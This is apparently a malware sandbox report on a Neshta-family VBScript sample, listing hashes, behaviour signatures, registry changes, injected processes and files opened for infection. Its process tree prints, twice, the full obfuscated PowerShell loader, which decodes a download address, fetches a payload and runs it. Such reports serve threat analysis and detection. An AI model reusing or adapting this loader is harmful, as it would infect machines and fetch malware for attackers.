neshta | 3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
23/05/2024, 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.vbs
Size

72KB
MD5

7bc04c5410cd2c7395ba82859240fea6
SHA1

014f8e77cdedd5141c80a316fc91741efdca8586
SHA256

3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a
SHA512

dde32bb051839b4d65edafde2189d56cd39489b70950b0ba6c4eaeb538ddac55201159995b41e9a380326cf4ad8d4703b1d25e169d71e64aab4f4ae5d6fdfb64
SSDEEP

1536:b0eys3Ih0nYdMOuImdjnQKOYVDDoUFYtBQBpPz5lEiFG7A:b0E7Y+OXmJnS2/AXQP1xG7A

Score

10^/10

neshta persistence spyware

Malware Config

Signatures

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Blocklisted process makes network request 5 IoCs

flow	pid	Process
26	5036	powershell.exe
28	5036	powershell.exe
30	5036	powershell.exe
32	5036	powershell.exe
33	5036	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3456	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2300	powershell.exe
3456	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2300 set thread context of 3456	2300	powershell.exe	100

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13185~1.29\MICROS~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13185~1.29\MICROS~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13185~1.29\MICROS~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	wab.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13185~1.29\MI391D~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	wab.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\svchost.com	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
5036	powershell.exe
5036	powershell.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2300	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1064 wrote to memory of 5036	1064	WScript.exe	92
PID 1064 wrote to memory of 5036	1064	WScript.exe	92
PID 5036 wrote to memory of 4832	5036	powershell.exe	95
PID 5036 wrote to memory of 4832	5036	powershell.exe	95
PID 5036 wrote to memory of 2300	5036	powershell.exe	98
PID 5036 wrote to memory of 2300	5036	powershell.exe	98
PID 5036 wrote to memory of 2300	5036	powershell.exe	98
PID 2300 wrote to memory of 4456	2300	powershell.exe	99
PID 2300 wrote to memory of 4456	2300	powershell.exe	99
PID 2300 wrote to memory of 4456	2300	powershell.exe	99
PID 2300 wrote to memory of 3456	2300	powershell.exe	100
PID 2300 wrote to memory of 3456	2300	powershell.exe	100
PID 2300 wrote to memory of 3456	2300	powershell.exe	100
PID 2300 wrote to memory of 3456	2300	powershell.exe	100
PID 2300 wrote to memory of 3456	2300	powershell.exe	100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
    3⤵
    PID:4832
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo 